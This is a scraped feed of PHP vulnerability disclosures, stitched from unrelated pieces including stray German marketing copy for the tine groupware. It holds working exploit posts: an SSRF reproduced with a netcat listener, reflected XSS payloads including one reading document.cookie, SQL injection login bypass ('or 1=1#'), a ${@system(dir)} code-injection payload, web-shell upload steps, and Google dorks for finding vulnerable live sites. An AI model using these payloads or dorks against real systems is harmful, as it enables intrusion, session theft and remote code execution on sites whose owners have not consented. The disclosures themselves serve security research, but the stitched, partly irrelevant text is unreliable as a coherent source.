Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to Server Side Request Forgery (SSRF) via admin/modules/bibliography/pop_p2p.php.

**The bug**

A Server Side Request Forgery exists in admin/modules/bibliography/pop_p2p.php at the code below

$detail\_uri = $\_GET\['uri'\] . "/index.php?p=show\_detail&inXML=true&id=" . $\_GET\['biblioID'\];
// parse XML
$data = modsXMLsenayan($detail\_uri, 'uri');

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to bibliography
2.  set up netcat to listen to a specific port (example: 7878)
3.  go to the /admin/modules/bibliography/pop_p2p.php?uri=http://LOCALHOST_OR_LISTENER_IP:7878
4.  the netcat should receive a request

**Screenshots****proof-of-concept using pipedream****proof-of-concept using netcat****versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

CVE-2023-40969: [Security Bugs]  Server Side Request Forgery at pop_p2p.php · Issue #204 · slims/slims9_bulian

In tine through 2023.01.14.325, the sort parameter of the /index.php endpoint allows SQL Injection.

**Mehr als nur Groupware**

**tine ist die ideale Software für digitale Zusammenarbeit in Unternehmen und Organisationen. Von kraftvollen Groupware-Funktionalitäten bis hin zu cleveren AddOns vereint **tine** alles, um die tägliche Zusammenarbeit im Team zu erleichtern.**

**Kalender****Mit tine wird das Termin­management zum Kinder­spiel. Egal, ob Einzel­termine, Serien­termine oder Ressourcen­planung mit Mitarbeitern oder externen Personen – tine ermöglicht eine unkomplizierte Termin­findung. Schnell und einfach.**

**Adress­buch****Zugegeben: Adressbuch ist eine glatte Unter­treibung. Hier geht es um mehr als eine reine Adress­sammlung. Das tine-Adress­buch ist der perfekte Beziehungs­manager!**

**E-Mail****Mehr als 600 E-Mails erhalten wir durch­schnitt­lich pro Monat am Arbeits­platz. E-Mails sind noch immer, trotz vieler Alter­nativen, das beliebteste Kommu­nika­tions­tool. Versenden Sie Ihre E-Mails mit tine, profitieren Sie von den vielen kleinen Features und schon haben Sie mehr Zeit für wichtigere Dinge!**

**Adressbuch**

Zugegeben: Adressbuch ist eine glatte Untertreibung. Hier geht es um mehr als eine reine Adresssammlung. Das Adressbuch ist der perfekte Beziehungsmanager!

**E-Mail**

Mehr als 600 E-Mails erhalten wir durchschnittlich pro Monat am Arbeitsplatz. Versenden Sie Ihre E-Mails mit tine, profitieren Sie von den vielen kleinen Features!

**Aufgaben**

Arbeiten Sie noch mit klassischen ToDo-Listen? Also Aufgaben auf Zettel schreiben und sobald sie erledigt sind, durchstreichen?  
Zeit für eine neue Ära!

**Dateimanager**

Für alle die unterwegs oder gemeinsam an Dokumenten arbeiten: Zentral ablegen, teilen, vor unerlaubtem Zugriff schützen und immer überall abrufen.

**Projektzeiterfassung**

Leistungen werden nicht korrekt abgerechnet? tine hilft Ihnen, Kundenprojekte oder unternehmensintern schneller, genauer und korrekter abzurechnen.

**CRM**

Verwalten und pflegen Sie Ihre Kundenbeziehungen und legen Sie all Ihr Wissen über Ihren Kontakt sicher ab – mit einem uneingeschränktem Zugriff auch von unterwegs!

CVE-2023-41364: HOME - tine

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Innovins CMS version 4.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Innovins CMS v4.7 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.innovins.com/                                                                                          || # Dork      : intext:Developed by - Innovins                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : events2.php?id= [+] http://www.127.0.0.1saingoorg/events2.php?id= <===== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Innovins CMS 4.7 SQL Injection

Online ID Generator version 1.0 suffers from remote SQL injection that allows for login bypass and remote shell upload vulnerabilities.

    ## Title: Online-ID-Generator-1.0-SQLi-Bypass-login-ShellUpload-RCE## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip## Reference: https://portswigger.net/web-security/sql-injection## Reference: https://portswigger.net/web-security/file-upload## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:hat-trick: The system of this pseudo developer is vulnerable to SQLi,Shell Upload, and RCE at the same time.This system must be terminated. To all users who like and follow thisperson: Please STOPT DOING THIS!THIS WILL BE YOUR RESPONSIBLE WHEN YOU LOSE MONEY OR WHATEVERIMPORTANT FOR YOU! BR @nu11secur1tySTATUS: HIGH-CRITICAL Vulnerability[+]Bypass login SQLi:# In login form, for user:```mysqlnu11secur1ty' or 1=1#```[+]Shell Upload exploit:## For system logo:```php<?php  phpinfo();?>```[+]RCE Exploit## Execution from the remote browser:```URLhttp://localhost/id_generator/uploads/1693471560_info.php```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)## Time spend:00:10:00

Online ID Generator 1.0 SQL Injection / Shell Upload

Islam CMS version 1.0 suffers from a remote PHP code injection vulnerability.

    ====================================================================================================================================| # Title     : islam cms v1.0 PHP code injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://almohtaref.net/                                                                                            || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /islamcms/index.php [+] In the search box use payload :     http://127.0.0.1/islamcms/index.php?name=search    ${@system(dir)}    ${@print inoushka}    word=%24%7b%40print indoushka}%7dGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Islam CMS 1.0 Code Injection

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Invasor Diagonal CMS 1.0 Cross Site Scripting

InterPhoto version 2.3.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : InterPhoto 2.3.0 Persians Remote Shell Upload vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.dl.persianscript.ir/script/InterPhoto_2.3.0_Persians(PersianScript.ir).zip                              || # Dork      : InterPhoto 2.3.0                                    '                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register an Account : http://site/register.php  [+] Upload the shell.php instead of your photo (shell.php.jpg) : http://site/mydesk.upload.php[+] so rename shell.php.jpg to shell.php by Live HTTP Headers.(Mozilla FireFox Add-ons)  [+] Locate the shell in this route : http://site/MyWebsiteImages/XX/original/YY.php  [+] XX=Name of This Folder Like This Pattern : Year_Month_RandomChar(Sample : 2012_10_oZUGCD7IP81I)  [+] YY=Name of Shell.(Renamed to Random Char)Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

InterPhoto 2.3.0 Shell Upload

The Colibri Page Builder for WordPress is vulnerable to SQL Injection via the ‘post_id’ parameter in versions up to, and including, 1.0.227 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVE-2023-2188: utils.php in colibri-page-builder/trunk/extend-builder – WordPress Plugin Repository

The WP Directory Kit plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the 'admin_page_display' function. This makes it possible for unauthenticated attackers to delete or change plugin settings, import demo data, modify or delete Directory Kit related posts and terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Partial patches were made avilable in versions 1.2.0 and 1.2.1 but the issue was not fully patched until 1.2.2

Tag

#php